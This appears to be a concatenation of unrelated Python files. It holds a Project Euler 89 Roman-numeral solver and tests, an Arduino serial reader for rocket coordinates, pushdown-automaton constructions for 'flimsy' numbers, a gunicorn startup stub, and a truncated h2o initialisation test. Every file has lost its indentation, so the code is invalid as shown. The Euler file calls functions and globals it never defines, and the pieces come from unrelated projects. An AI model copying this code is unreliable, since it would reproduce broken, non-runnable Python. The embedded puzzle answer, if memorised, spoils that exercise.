def format_roman_numeral_old(number):
s = ''
if 900 <= number < 1000:
s += 'C'
number += 100
while number >= 1000:
s += 'M'
number -= 1000
if 900 <= number < 1000:
s += 'C'
number += 100
if 400 <= number < 500:
s += 'C'
number += 100
if number >= 500:
s += 'D'
number -= 500
if 90 <= number < 100:
s += 'X'
number += 10
while number >= 100:
s += 'C'
number -= 100
if 90 <= number < 100:
s += 'X'
number += 10
if 40 <= number < 50:
s += 'X'
number += 10
if number >= 50:
s += 'L'
number -= 50
if number == 9:
s += 'I'
number += 1
while number >= 10:
s += 'X'
number -= 10
if number == 9:
s += 'I'
number += 1
if number == 4:
s += 'I'
number += 1
if number >= 5:
s += 'V'
number -= 5
while number >= 1:
s += 'I'
number -= 1
return s
def parse_roman_numeral(numeral):
global mapping, order
last_order = -1
s = 0
for c in numeral:
if c not in mapping:
raise ValueError("unknown char: " + c)
current_order = order.index(c)
if current_order < last_order:
s -= mapping[order[last_order]] * 2
last_order = current_order
s += mapping[c]
return s
def optimize_roman_numeral(numeral):
return format_roman_numeral(parse_roman_numeral(numeral))
def solve():
numerals = read_numerals("data/problem089.txt")
savings = 0
for numeral in numerals:
o = optimize_roman_numeral(numeral)
savings += len(numeral) - len(o)
return savings
class Test(unittest.TestCase):
def test_samples(self):
test_cases = {
'I': 1,
'II': 2,
'IV': 4,
'XVI': 16,
'XIX': 19,
'XLIX': 49,
'XL': 40,
'XC': 90,
'XCV': 95,
'CD': 400,
'CM': 900,
'MMMMDXCV': 4595,
'MMMMCMXCIX': 4999
}
for c in test_cases:
self.assertEqual(c, format_roman_numeral(test_cases[c]))
def test_parse_format_compatibility(self):
for i in range(5000):
self.assertEqual(i, parse_roman_numeral(format_roman_numeral(i)))
def test_old_new_compatibility(self):
for i in range(5000):
self.assertEqual(format_roman_numeral_old(i), format_roman_numeral(i))
def test_answer(self):
self.assertEqual(743, solve())
pass
# -----------------------------------------
def run():
return solve()
if __name__ == '__main__':
unittest.main()
# if __name__ == '__main__':
# t = timeit.Timer("run()", "from __main__ import run")
# count = 1
# print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
|
import PyCmdMessenger
import threading
import time
SERIAL_PORT = "/dev/cu.usbmodem1421"
BAUD_RATE = 9600
ARDUINO_INTERFACE = PyCmdMessenger.ArduinoBoard(SERIAL_PORT, baud_rate = BAUD_RATE)
MESSENGER_COMMANDS= [["get_rocket_location",""],
["rocket_location_response","s"],
["send_rocket_command","i"],
["rocket_command_response","s"],
["error","s"]]
MESSENGER = PyCmdMessenger.CmdMessenger(ARDUINO_INTERFACE, MESSENGER_COMMANDS)
class PyCmdMessenger(threading.Thread):
def __init__(self, threadID, name, server):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.server = server
def run(self):
while True:
MESSENGER.send("get_rocket_location")
response = MESSENGER.receive()
location = response[1][0]
formatted_string = location.replace("/.", ".").split(",")
formatted_location = list(map(float, formatted_string))
self.server.lat = formatted_location[0]
self.server.lng = formatted_location[1]
|
from PDA import PDA
import math
EMPTY_STRING = ''
def int_to_bin(x):
return x.__format__('b')
def s_2(x):
return int_to_bin(x).count('1')
def base_b(n,b):
s = EMPTY_STRING
while n > 0:
s += str(n % b)
n //= b
return s[::-1]
def s_b(n,b):
count = 0
while n > 0:
count += n % b
n //= b
return count
# def is_k_flimsy(x, k):
# return s_2(x) > s_2(k*x)
# def find_first_k_flimsy_numbers (k, limit): # Finds the k-flimsy integers in [1..limit]
# output = []
# for i in range (1, limit):
# if (is_k_flimsy(i,k)):
# output.append(i)
# return output
def create_palindrome_PDA():
states = {'S', 'END'}
alphabet = {'', 'a', 'b'}
stack_alphabet = {'Z', 'a', 'b'}
start_state = 'S'
start_stack = 'Z'
transitions = {
('S', 'a', 'Z'): [('S', 'aZ'), ('END', 'Z')],
('S', 'a', 'a'): [('S', 'aa'), ('END', 'a')],
('S', 'a', 'b'): [('S', 'ab'), ('END', 'b')],
('S', 'b', 'Z'): [('S', 'bZ'), ('END', 'Z')],
('S', 'b', 'a'): [('S', 'ba'), ('END', 'a')],
('S', 'b', 'b'): [('S', 'bb'), ('END', 'b')],
('S', '', 'Z'): [('END', 'Z')],
('S', '', 'a'): [('END', 'a')],
('S', '', 'b'): [('END', 'b')],
('END', '', 'Z'): [('END', '')],
('END', 'a', 'a'): [('END', '')],
('END', 'b', 'b'): [('END', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_even_palindrome_PDA():
states = {'S', 'END'}
alphabet = {'', 'a', 'b'}
stack_alphabet = {'Z', 'a', 'b'}
start_state = 'S'
start_stack = 'Z'
transitions = {
('S', 'a', 'Z'): [('S', 'aZ')],
('S', 'a', 'a'): [('S', 'aa')],
('S', 'a', 'b'): [('S', 'ab')],
('S', 'b', 'Z'): [('S', 'bZ')],
('S', 'b', 'a'): [('S', 'ba')],
('S', 'b', 'b'): [('S', 'bb')],
('S', '', 'Z'): [('END', 'Z')],
('S', '', 'a'): [('END', 'a')],
('S', '', 'b'): [('END', 'b')],
('END', '', 'Z'): [('END', '')],
('END', 'a', 'a'): [('END', '')],
('END', 'b', 'b'): [('END', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_even_palindrome_PDA_alternate():
states = {'q_0', 'q_1', 'q_2'}
alphabet = {'a', 'b', ''}
stack_alphabet = {'Z', 'a', 'b'}
start_state = 'q_0'
start_stack = 'Z'
transitions = {
('q_0', 'a', 'Z'): [('q_0', 'aZ')],
('q_0', 'a', 'a'): [('q_0', 'aa')],
('q_0', 'a', 'b'): [('q_0', 'ab')],
('q_0', 'b', 'Z'): [('q_0', 'bZ')],
('q_0', 'b', 'a'): [('q_0', 'ba')],
('q_0', 'b', 'b'): [('q_0', 'bb')],
('q_0', '', 'Z'): [('q_1', 'Z')],
('q_0', '', 'a'): [('q_1', 'a')],
('q_0', '', 'b'): [('q_1', 'b')],
('q_1', 'a', 'a'): [('q_1', '')],
('q_1', 'b', 'b'): [('q_1', '')],
('q_1', '', 'Z'): [('q_2', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_an_bn_PDA():
states = {'S', 'END'}
alphabet = {'', 'a', 'b'}
stack_alphabet = {'Z', 'a'}
start_state = 'S'
start_stack = 'Z'
transitions = {
('S', '', 'Z'): [('END', '')],
('S', 'a', 'Z'): [('S', 'aZ')],
('S', 'a', 'a'): [('S', 'aa')],
('S', 'b', 'a'): [('END', '')],
('END', '', 'Z'): [('END', '')],
('END', 'b', 'a'): [('END', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_equal_as_bs_PDA():
states = {'S', 'END'}
alphabet = {'', 'a', 'b'}
stack_alphabet = {'Z', 'a', 'b'}
start_state = 'S'
start_stack = 'Z'
transitions = {
('S', '', 'Z'): [('END', '')],
('S', 'a', 'Z'): [('S', 'aZ')],
('S', 'a', 'a'): [('S', 'aa')],
('S', 'a', 'b'): [('S', '')],
('S', 'b', 'Z'): [('S', 'bZ')],
('S', 'b', 'a'): [('S', '')],
('S', 'b', 'b'): [('S', 'bb')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_dyck_PDA(): # TODO: Test this
states = {'S', 'END'}
alphabet = {'', '(', ')'}
stack_alphabet = {'Z', '('}
start_state = 'S'
start_stack = 'Z'
transitions = {
('S', '(', 'Z'): [('S', '(Z')],
('S', '(', '('): [('S', '((')],
('S', ')', '('): [('S', '')],
('S', '', 'Z'): [('END', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# For the language a^m b^n c^m
def create_am_bn_cm_PDA():
states = {'q_0', 'q_1', 'q_2'}
alphabet = {'', 'a', 'b', 'c'}
stack_alphabet = {'Z', 'a'}
start_state = 'q_0'
start_stack = 'Z'
transitions = {
('q_0', 'a', 'Z'): [('q_0', 'aZ')],
('q_0', 'a', 'a'): [('q_0', 'aa')],
('q_0', '', 'Z'): [('q_0', '')],
('q_0', 'b', 'Z'): [('q_1', 'Z')],
('q_0', 'b', 'a'): [('q_1', 'a')],
('q_0', 'c', 'a'): [('q_2', '')],
('q_1', 'b', 'Z'): [('q_1', 'Z')],
('q_1', 'b', 'a'): [('q_1', 'a')],
('q_1', '', 'Z'): [('q_1', '')],
('q_1', 'c', 'a'): [('q_2', '')],
('q_2', 'c', 'a'): [('q_2', '')],
('q_2', '', 'Z'): [('q_2', '')],
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all 3-flimsy binary numbers
def create_3flimsy_PDA():
states = {'-0', '-1', '-2', '+2', '+1', '+0', 'END'}
alphabet = {'0', '1', ''}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {
('-0', '0', 'Z'): [('-0', 'Z')],
('-0', '0', 'X'): [('-0', 'X')],
('-0', '1', 'Z'): [('-1', 'Z')],
('-0', '1', 'X'): [('-1', 'X')],
('-1', '0', 'Z'): [('-0', 'XZ')],
('-1', '0', 'X'): [('-0', 'XX')],
('-1', '1', 'Z'): [('+2', 'Z')],
('-1', '1', 'X'): [('-2', '')],
('-2', '0', 'Z'): [('-1', 'Z')],
('-2', '0', 'X'): [('-1', 'X')],
('-2', '1', 'Z'): [('-2', 'Z')],
('-2', '1', 'X'): [('-2', 'X')],
('+2', '0', 'Z'): [('+1', 'Z')],
('+2', '0', 'X'): [('+1', 'X')],
('+2', '1', 'Z'): [('+2', 'Z')],
('+2', '1', 'X'): [('+2', 'X'), ('END', '')],
('+1', '0', 'Z'): [('-0', 'Z')],
('+1', '0', 'X'): [('+0', '')],
('+1', '1', 'Z'): [('+2', 'XZ'), ('END', '')],
('+1', '1', 'X'): [('+2', 'XX'), ('END', '')],
('+0', '0', 'Z'): [('+0', 'Z')],
('+0', '0', 'X'): [('+0', 'X')],
('+0', '1', 'Z'): [('+1', 'Z')],
('+0', '1', 'X'): [('+1', 'X'), ('END', '')],
('END', '', 'Z'): [('END', '')],
('END', '', 'X'): [('END', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_3flimsy_PDA_alternate():
states = {'-0', '-1', '-2', '+2', '+1', '+0', 'END_0', 'END_1'}
alphabet = {'0', '1', ''}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {
('-0', '0', 'Z'): [('-0', 'Z')],
('-0', '0', 'X'): [('-0', 'X')],
('-0', '1', 'Z'): [('-1', 'Z')],
('-0', '1', 'X'): [('-1', 'X')],
('-1', '0', 'Z'): [('-0', 'XZ')],
('-1', '0', 'X'): [('-0', 'XX')],
('-1', '1', 'Z'): [('+2', 'Z')],
('-1', '1', 'X'): [('-2', '')],
('-2', '0', 'Z'): [('-1', 'Z')],
('-2', '0', 'X'): [('-1', 'X')],
('-2', '1', 'Z'): [('-2', 'Z')],
('-2', '1', 'X'): [('-2', 'X')],
('+2', '0', 'Z'): [('+1', 'Z')],
('+2', '0', 'X'): [('+1', 'X')],
('+2', '1', 'Z'): [('+2', 'Z')],
('+2', '1', 'X'): [('+2', 'X'), ('END_1', 'X')],
('+1', '0', 'Z'): [('-0', 'Z')],
('+1', '0', 'X'): [('+0', '')],
('+1', '1', 'Z'): [('+2', 'XZ'), ('END_0', 'Z')],
('+1', '1', 'X'): [('+2', 'XX'), ('END_0', 'X')],
('+0', '0', 'Z'): [('+0', 'Z')],
('+0', '0', 'X'): [('+0', 'X')],
('+0', '1', 'Z'): [('+1', 'Z')],
('+0', '1', 'X'): [('+1', 'X'), ('END_1', 'X')],
('END_0', '', 'Z'): [('END_0', '')],
('END_0', '', 'X'): [('END_0', '')],
('END_1', '', 'X'): [('END_0', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_3equal_PDA():
states = {'-0', '-1', '-2', '+2', '+1', '+0', 'END_0'}
alphabet = {'0', '1', ''}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {
('-0', '0', 'Z'): [('-0', 'Z')],
('-0', '0', 'X'): [('-0', 'X')],
('-0', '1', 'Z'): [('-1', 'Z')],
('-0', '1', 'X'): [('-1', 'X')],
('-1', '0', 'Z'): [('-0', 'XZ')],
('-1', '0', 'X'): [('-0', 'XX')],
('-1', '1', 'Z'): [('+2', 'Z'), ('END_0', '')],
('-1', '1', 'X'): [('-2', '')],
('-2', '0', 'Z'): [('-1', 'Z')],
('-2', '0', 'X'): [('-1', 'X')],
('-2', '1', 'Z'): [('-2', 'Z')],
('-2', '1', 'X'): [('-2', 'X')],
('+2', '0', 'Z'): [('+1', 'Z')],
('+2', '0', 'X'): [('+1', 'X')],
('+2', '1', 'Z'): [('+2', 'Z'), ('END_0', '')],
('+2', '1', 'X'): [('+2', 'X')],
('+1', '0', 'Z'): [('-0', 'Z')],
('+1', '0', 'X'): [('+0', '')],
('+1', '1', 'Z'): [('+2', 'XZ')],
('+1', '1', 'X'): [('+2', 'XX')],
('+0', '0', 'Z'): [('+0', 'Z')],
('+0', '0', 'X'): [('+0', 'X')],
('+0', '1', 'Z'): [('+1', 'Z'), ('END_0', '')],
('+0', '1', 'X'): [('+1', 'X')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_5equal_PDA():
states = {'-0', '-1', '-2', '-3', '-4', '+4', '+3', '+2', '+1', '+0', 'END_0', 'END_1'}
alphabet = {'0', '1', ''}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {
('+0', '0', 'X'): [('+0', 'X')],
('+0', '0', 'Z'): [('+0', 'Z')],
('+0', '1', 'X'): [('+2', 'X')],
('+0', '1', 'Z'): [('+2', 'Z'), ('END_0', 'Z')],
('+1', '0', 'X'): [('+0', '')],
('+1', '0', 'Z'): [('-0', 'Z')],
('+1', '1', 'X'): [('+3', 'XX')],
('+1', '1', 'Z'): [('+3', 'XZ'), ('END_0', 'Z')],
('+2', '0', 'X'): [('+1', 'X')],
('+2', '0', 'Z'): [('+1', 'Z')],
('+2', '1', 'X'): [('+3', 'X'), ('END_1', 'X')],
('+2', '1', 'Z'): [('+3', 'Z')],
('+3', '0', 'X'): [('+1', '')],
('+3', '0', 'Z'): [('-1', 'Z')],
('+3', '1', 'X'): [('+4', 'XX')],
('+3', '1', 'Z'): [('+4', 'XZ')],
('+4', '0', 'X'): [('+2', 'X')],
('+4', '0', 'Z'): [('+2', 'Z')],
('+4', '1', 'X'): [('+4', 'X')],
('+4', '1', 'Z'): [('+4', 'Z'), ('END_0', 'Z')],
('-0', '0', 'X'): [('-0', 'X')],
('-0', '0', 'Z'): [('-0', 'Z')],
('-0', '1', 'X'): [('-2', 'X')],
('-0', '1', 'Z'): [('-2', 'Z')],
('-1', '0', 'X'): [('-0', 'XX')],
('-1', '0', 'Z'): [('-0', 'XZ')],
('-1', '1', 'X'): [('-3', '')],
('-1', '1', 'Z'): [('+3', 'Z')],
('-2', '0', 'X'): [('-1', 'X')],
('-2', '0', 'Z'): [('-1', 'Z')],
('-2', '1', 'X'): [('-3', 'X')],
('-2', '1', 'Z'): [('-3', 'Z')],
('-3', '0', 'X'): [('-1', 'XX')],
('-3', '0', 'Z'): [('-1', 'XZ')],
('-3', '1', 'X'): [('-4', '')],
('-3', '1', 'Z'): [('+4', 'Z'), ('END_0', 'Z')],
('-4', '0', 'X'): [('-2', 'X')],
('-4', '0', 'Z'): [('-2', 'Z')],
('-4', '1', 'X'): [('-4', 'X')],
('-4', '1', 'Z'): [('-4', 'Z')],
('END_0', '', 'Z'): [('END_0', '')],
('END_1', '', 'X'): [('END_0', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all k-flimsy binary numbers
def create_flimsy_PDA(k):
assert (type(k) == int) and (k > 1) and (k % 2 == 1)
states = {'END_0'}
alphabet = {'0', '1', EMPTY_STRING}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {('END_0', EMPTY_STRING, 'Z'): [('END_0', EMPTY_STRING)],
('END_0', EMPTY_STRING, 'X'): [('END_0', EMPTY_STRING)]}
for carry in range(k):
s = str(carry)
states.add('-' + s)
states.add('+' + s)
for si in alphabet:
if si != EMPTY_STRING:
i = int(si)
for z in stack_alphabet:
added = i * k + carry
new_kn_digit = added % 2
new_carry = str(added // 2)
if new_kn_digit % 2 == i:
transitions[('-' + s, si, z)] = [('-' + new_carry, z)]
transitions[('+' + s, si, z)] = [('+' + new_carry, z)]
elif new_kn_digit % 2 == 1:
assert (i == 0) # n goes up by 0, kn goes up by 1
transitions[('-' + s, si, z)] = [('-' + new_carry, 'X' + z)]
if z == 'X':
transitions[('+' + s, si, z)] = [('+' + new_carry, EMPTY_STRING)]
else:
transitions[('+' + s, si, z)] = [('-' + new_carry, z)]
else:
assert (new_kn_digit % 2 == 0)
assert (i == 1) # n goes up by 1, kn goes up by 0
transitions[('+' + s, si, z)] = [('+' + new_carry, 'X' + z)]
if z == 'X':
transitions[('-' + s, si, z)] = [('-' + new_carry, EMPTY_STRING)]
else:
transitions[('-' + s, si, z)] = [('+' + new_carry, z)]
# Add new end states
# Transitions from END_{i+1} to END_{i} that read nothing but pop an X
for i in range(int(math.log2(k))):
new_state = 'END_' + str(i + 1)
states.add(new_state)
one_less = 'END_' + str(i)
transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
# 1-transitions that pop nothing from final states to END_x for some x?
for carry in range(k):
current_state = '+' + str(carry)
required_pops = s_2(k + carry) - 1
transitions[(current_state, '1', 'X')].append(('END_' + str(required_pops), 'X'))
if required_pops == 0:
transitions[(current_state, '1', 'Z')].append(('END_' + str(required_pops), 'Z'))
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all n where b(n) = b(kn)
def create_k_equal_PDA(k):
assert (type(k) == int) and (k > 1) and (k % 2 == 1)
states = {'END_0'}
alphabet = {'0', '1', EMPTY_STRING}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {('END_0', EMPTY_STRING, 'Z'): [('END_0', EMPTY_STRING)]}
for carry in range(k):
s = str(carry)
states.add('-' + s)
states.add('+' + s)
for si in alphabet:
if si != EMPTY_STRING:
i = int(si)
for z in stack_alphabet:
added = i * k + carry
new_kn_digit = added % 2
new_carry = str(added // 2)
if new_kn_digit % 2 == i:
transitions[('-' + s, si, z)] = [('-' + new_carry, z)]
transitions[('+' + s, si, z)] = [('+' + new_carry, z)]
elif new_kn_digit % 2 == 1:
assert (i == 0) # n goes up by 0, kn goes up by 1
transitions[('-' + s, si, z)] = [('-' + new_carry, 'X' + z)]
if z == 'X':
transitions[('+' + s, si, z)] = [('+' + new_carry, EMPTY_STRING)]
else:
transitions[('+' + s, si, z)] = [('-' + new_carry, z)]
else:
assert (new_kn_digit % 2 == 0)
assert (i == 1) # n goes up by 1, kn goes up by 0
transitions[('+' + s, si, z)] = [('+' + new_carry, 'X' + z)]
if z == 'X':
transitions[('-' + s, si, z)] = [('-' + new_carry, EMPTY_STRING)]
else:
transitions[('-' + s, si, z)] = [('+' + new_carry, z)]
# Add new end states
# Transitions from END_{i+1} to END_{i} that read nothing but pop an X
for i in range(int(math.log2(k))):
new_state = 'END_' + str(i + 1)
states.add(new_state)
one_less = 'END_' + str(i)
transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
# 1-transitions that pop Z (stack bottom) from stack iff reading 100000... would leave PDA at -0 with empty stack
b = math.floor(math.log2(k)) + 1
pda_states = {(start_state,
start_stack)} # working backwards from the state we want to get to, simulating reading last 1 plus leading zeros
for letter in ('0' * b + '1'):
temp = set()
for (state, stack) in pda_states:
# for all (q, S) such that ((state, stack_top) in transitions[(q, letter, S)])
# temp.add((q, S))
assert (len(stack) > 0)
for (q, let, S) in transitions:
if let == letter:
destinations = transitions[(q, letter, S)]
if (state, stack[-1]) in destinations: # no push or pop
new_stack = stack[:-1] + S
temp.add((q, new_stack))
if (state, EMPTY_STRING) in destinations: # pop
new_stack = stack + S
temp.add((q, new_stack))
if (len(stack) > 1) and ((state, stack[-2] + 'X') in destinations): # push
new_stack = stack[:-2] + S
temp.add((q, new_stack))
pda_states = temp
for (state, stack) in pda_states:
assert (len(stack) > 0)
stack_top = stack[-1]
required_pops = len(stack) - 1
# Add transition (to transitions) from $state to END by popping $stack_height
transitions[(state, '1', stack_top)].append(('END_' + str(required_pops), stack_top))
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
# Create a PDA to accept all 3-flimsy binary numbers
def create_2_flimsy_ternary_PDA():
states = {'-0', '-1', '+1', '+0', 'END_0', 'END_1'}
alphabet = {'0', '1', '2', ''}
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {
('-0', '0', 'Z'): [('-0', 'Z')],
('-0', '0', 'X'): [('-0', 'X')],
('-0', '1', 'Z'): [('-0', 'XZ')],
('-0', '1', 'X'): [('-0', 'XX')],
('-0', '2', 'Z'): [('+1', 'Z')],
('-0', '2', 'X'): [('-1', '')],
('-1', '0', 'Z'): [('-0', 'XZ')],
('-1', '0', 'X'): [('-0', 'XX')],
('-1', '1', 'Z'): [('+1', 'Z')],
('-1', '1', 'X'): [('-1', '')],
('-1', '2', 'Z'): [('-1', 'Z')],
('-1', '2', 'X'): [('-1', 'X')],
('+0', '0', 'Z'): [('+0', 'Z')],
('+0', '0', 'X'): [('+0', 'X')],
('+0', '1', 'Z'): [('-0', 'Z')],
('+0', '1', 'X'): [('+0', ''), ('END_1', 'X')],
('+0', '2', 'Z'): [('+1', 'XZ'), ('END_0', 'Z')],
('+0', '2', 'X'): [('+1', 'XX'), ('END_0', 'X')],
('+1', '0', 'Z'): [('-0', 'Z')],
('+1', '0', 'X'): [('+0', '')],
('+1', '1', 'Z'): [('+1', 'XZ'), ('END_0', 'Z')],
('+1', '1', 'X'): [('+1', 'XX'), ('END_0', 'X')],
('+1', '2', 'Z'): [('+1', 'Z')],
('+1', '2', 'X'): [('+1', 'X'), ('END_1', 'X')],
('END_1', '', 'X'): [('END_0', '')],
('END_0', '', 'Z'): [('END_0', '')],
('END_0', '', 'X'): [('END_0', '')]
}
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def _char_to_int(c): # Get integer from generalized ASCII number
return ord(c) - ord('0')
def _int_to_char(i): # Get ASCII character for given number
return chr(ord('0')+i)
def _create_flimsy_transitions(states: set, transitions: dict, stack_change: int, old_carry: str, new_carry: str, read_char: str):
if stack_change == 0:
transitions[('-' + old_carry, read_char, 'Z')] = [('-' + new_carry, 'Z')]
transitions[('-' + old_carry, read_char, 'X')] = [('-' + new_carry, 'X')]
transitions[('+' + old_carry, read_char, 'Z')] = [('+' + new_carry, 'Z')]
transitions[('+' + old_carry, read_char, 'X')] = [('+' + new_carry, 'X')]
elif stack_change == 1:
transitions[('+' + old_carry, read_char, 'Z')] = [('+' + new_carry, 'XZ')]
transitions[('+' + old_carry, read_char, 'X')] = [('+' + new_carry, 'XX')]
transitions[('-' + old_carry, read_char, 'Z')] = [('+' + new_carry, 'Z')]
transitions[('-' + old_carry, read_char, 'X')] = [('-' + new_carry, EMPTY_STRING)]
elif stack_change == -1:
transitions[('-' + old_carry, read_char, 'Z')] = [('-' + new_carry, 'XZ')]
transitions[('-' + old_carry, read_char, 'X')] = [('-' + new_carry, 'XX')]
transitions[('+' + old_carry, read_char, 'Z')] = [('-' + new_carry, 'Z')]
transitions[('+' + old_carry, read_char, 'X')] = [('+' + new_carry, EMPTY_STRING)]
elif stack_change > 1:
current_state_plus = '+'+old_carry
current_state_minus = '-'+old_carry
while stack_change > 1:
stack_change -= 1
intermediate_state_plus = 'push_'+str(stack_change)+'_to_+'+new_carry
intermediate_state_minus = 'pop_'+str(stack_change)+'_to_-'+new_carry
transitions[(current_state_plus, read_char, 'Z')] = [(intermediate_state_plus, 'XZ')]
transitions[(current_state_plus, read_char, 'X')] = [(intermediate_state_plus, 'XX')]
transitions[(current_state_minus, read_char, 'Z')] = [(intermediate_state_plus, 'Z')]
transitions[(current_state_minus, read_char, 'X')] = [(intermediate_state_minus, EMPTY_STRING)]
if intermediate_state_plus in states and intermediate_state_minus in states:
return
states.add(intermediate_state_plus)
states.add(intermediate_state_minus)
current_state_plus = intermediate_state_plus
current_state_minus = intermediate_state_minus
read_char = EMPTY_STRING
final_state_plus = '+'+new_carry
final_state_minus = '-'+new_carry
transitions[(current_state_plus, read_char, 'Z')] = [(final_state_plus, 'XZ')]
transitions[(current_state_plus, read_char, 'X')] = [(final_state_plus, 'XX')]
transitions[(current_state_minus, read_char, 'Z')] = [(final_state_plus, 'Z')]
transitions[(current_state_minus, read_char, 'X')] = [(final_state_minus, EMPTY_STRING)]
elif stack_change < -1:
current_state_plus = '+' + old_carry
current_state_minus = '-' + old_carry
while stack_change < -1:
stack_change += 1
intermediate_state_plus = 'pop_' + str(-stack_change) + '_to_+' + new_carry
intermediate_state_minus = 'push_' + str(-stack_change) + '_to_-' + new_carry
transitions[(current_state_minus, read_char, 'Z')] = [(intermediate_state_minus, 'XZ')]
transitions[(current_state_minus, read_char, 'X')] = [(intermediate_state_minus, 'XX')]
transitions[(current_state_plus, read_char, 'Z')] = [(intermediate_state_minus, 'Z')]
transitions[(current_state_plus, read_char, 'X')] = [(intermediate_state_plus, EMPTY_STRING)]
if intermediate_state_plus in states and intermediate_state_minus in states:
return
states.add(intermediate_state_plus)
states.add(intermediate_state_minus)
current_state_plus = intermediate_state_plus
current_state_minus = intermediate_state_minus
read_char = EMPTY_STRING
final_state_plus = '+'+new_carry
final_state_minus = '-'+new_carry
transitions[(current_state_minus, read_char, 'Z')] = [(final_state_minus, 'XZ')]
transitions[(current_state_minus, read_char, 'X')] = [(final_state_minus, 'XX')]
transitions[(current_state_plus, read_char, 'Z')] = [(final_state_minus, 'Z')]
transitions[(current_state_plus, read_char, 'X')] = [(final_state_plus, EMPTY_STRING)]
# Create a PDA to accept all k-flimsy binary numbers
def create_base_b_k_flimsy_PDA(b, k):
assert (type(k) == int) and (type(b) == int) and (k >= 1) and (b > 1)
while k % b == 0:
k //= b
states = {'END'}
alphabet = {EMPTY_STRING}
for i in range(b):
alphabet.add(_int_to_char(i))
stack_alphabet = {'Z', 'X'}
start_state = '-0'
start_stack = 'Z'
transitions = {('END', EMPTY_STRING, 'Z'): [('END', EMPTY_STRING)],
('END', EMPTY_STRING, 'X'): [('END', EMPTY_STRING)]}
# Add END states, to pop at least/most i X's off the stack before reaching END
# Transitions from END_{i+1} to END_{i} that read nothing but pop an X
states.add('pop_at_most_0_to_END')
transitions[('pop_at_most_0_to_END', EMPTY_STRING, 'Z')] = [('END', EMPTY_STRING)]
for i in range(int(2*(b-1)*math.log(k+1, b) + 0.01)+1): # TODO: confirm this
new_state = 'pop_at_least_' + str(i + 1) + '_to_END'
one_less = 'END' if i == 0 else ('pop_at_least_' + str(i) + '_to_END')
states.add(new_state)
transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
new_state = 'pop_at_most_' + str(i + 1) + '_to_END'
one_less = 'pop_at_most_' + str(i) + '_to_END'
states.add(new_state)
transitions[(new_state, EMPTY_STRING, 'Z')] = [('END', EMPTY_STRING)]
transitions[(new_state, EMPTY_STRING, 'X')] = [(one_less, EMPTY_STRING)]
# Add main states (+/- carry)
# Transitions between those states based on reading non-final input chars
for carry in range(k):
s = _int_to_char(carry)
states.add('-' + s)
states.add('+' + s)
for si in alphabet:
if si != EMPTY_STRING:
i = _char_to_int(si)
added = i * k + carry
new_kn_digit = added % b
new_carry = _int_to_char(added // b)
stack_change = i - new_kn_digit # if positive, push on + state and pop on - state; else vice versa
_create_flimsy_transitions(states, transitions, stack_change, s, new_carry, si)
# nonzero-transitions that pop nothing from final (sign, carry) states to END_i state
for carry in range(k):
for read_char in alphabet:
if read_char != EMPTY_STRING and read_char != '0':
read_digit = _char_to_int(read_char)
plus_state = '+' + _int_to_char(carry)
min_required_pops = s_b(k*read_digit + carry, b) - read_digit
if min_required_pops > 0:
transitions[(plus_state, read_char, 'X')].append(('pop_at_least_' + str(min_required_pops) + '_to_END', 'X'))
if not ('pop_at_least_' + str(min_required_pops) + '_to_END') in states:
print("MISSING POP AT LEAST", min_required_pops, "state")
assert False
else:
transitions[(plus_state, read_char, 'Z')].append(('END', 'Z'))
transitions[(plus_state, read_char, 'X')].append(('END', 'X'))
minus_state = '-' + _int_to_char(carry)
max_required_pops = read_digit - s_b(k*read_digit + carry, b) - 1
if max_required_pops >= 0:
transitions[(minus_state, read_char, 'Z')].append(('END', 'Z'))
for i in range(1, max_required_pops + 1):
transitions[(minus_state, read_char, 'X')].append(('pop_at_most_' + str(i) + '_to_END', 'X'))
if not ('pop_at_most_' + str(i) + '_to_END') in states:
print("MISSING POP AT MOST", min_required_pops, "state")
assert False
return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
|
# startup.py
# points gunicorn at our main.py within the src/app directory
from src.app.main import app
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Test h2o initialization / startup options.
Currently, our R/Python test suite is executed against an established h2o cluster (run.py sets up the cluster).
However, we ignore the mode of operation where the h2o cluster is created by the client. Consequently, we may not
recognize bugs in h2o.init() for this mode of operation.
For this ticket, I think we should create a set of tests that check that h2o.init() is successful for each
OS/client interface combination.
"""
from __future__ import print_function
import sys
sys.path.insert(0, "../..")
import h2o
from h2o.backend import H2OLocalServer
from h2o.exceptions import H2OConnectionError
PORT = 55330
# Check whether there is already an instance running at the specified port, and if so shut it down.
try:
conn = h2o.connect(ip="localhost", port=PORT)
conn.cluster.shutdown(prompt=False)
